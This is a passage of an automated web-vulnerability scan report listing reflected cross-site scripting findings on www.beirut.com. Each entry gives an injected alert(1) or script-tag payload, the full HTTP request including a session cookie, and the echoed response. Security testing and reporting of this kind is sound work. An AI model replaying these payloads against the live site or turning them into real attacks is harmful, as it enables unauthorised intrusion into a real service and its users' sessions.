Content-Type: text/html; charset=UTF-8
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping30952'-alert(1)-'556232b32e7/Books-Music-Movies';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.725. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9795b"><a>4e0ac1c97f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping9795b"><a>4e0ac1c97f/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:45:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping9795b"><a>4e0ac1c97f">
...[SNIP]...

4.726. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d27'-alert(1)-'0ab7e97c8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies96d27'-alert(1)-'0ab7e97c8fd/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies96d27'-alert(1)-'0ab7e97c8fd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.727. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e072<script>alert(1)</script>4f7f6dbcf6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies4e072<script>alert(1)</script>4f7f6dbcf6c/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:59:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies4e072<script>alert(1)</script>4f7f6dbcf6c <a href="#" id="backlink">
...[SNIP]...

4.728. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d8e"><a>ae77423f8af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping38d8e"><a>ae77423f8af/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:48:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping38d8e"><a>ae77423f8af">
...[SNIP]...

4.729. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bc3'-alert(1)-'4dd26508804 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingb9bc3'-alert(1)-'4dd26508804/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:59:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingb9bc3'-alert(1)-'4dd26508804/Books-Music-Movies/05084418/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.730. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c03'-alert(1)-'62fb6b285db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Moviesf6c03'-alert(1)-'62fb6b285db/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:07:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Moviesf6c03'-alert(1)-'62fb6b285db/05084418/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.731. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46801<script>alert(1)</script>5e38308e28a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies46801<script>alert(1)</script>5e38308e28a/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:09:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies46801<script>alert(1)</script>5e38308e28a <a href="#" id="backlink">
...[SNIP]...

4.732. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c002'-alert(1)-'6820f139974 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/050844185c002'-alert(1)-'6820f139974/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/050844185c002'-alert(1)-'6820f139974/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.733. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb77a'-alert(1)-'446509ffabe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshopseb77a'-alert(1)-'446509ffabe/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Movies/05084418/Bookshopseb77a'-alert(1)-'446509ffabe/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.734. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e92'-alert(1)-'e32a804b249 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshops/5e8e92'-alert(1)-'e32a804b249 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:43:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/05084418/Bookshops/5e8e92'-alert(1)-'e32a804b249';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.735. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466f3"><a>1a8722d16db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping466f3"><a>1a8722d16db/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping466f3"><a>1a8722d16db">
...[SNIP]...

4.736. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c66c'-alert(1)-'eae7df1b843 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping3c66c'-alert(1)-'eae7df1b843/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping3c66c'-alert(1)-'eae7df1b843/Books-Music-Movies/05084418/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.737. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbff0'-alert(1)-'1b41822ee5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Moviesbbff0'-alert(1)-'1b41822ee5a/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:02:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Moviesbbff0'-alert(1)-'1b41822ee5a/05084418/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.738. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce2d2<script>alert(1)</script>8528b945f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

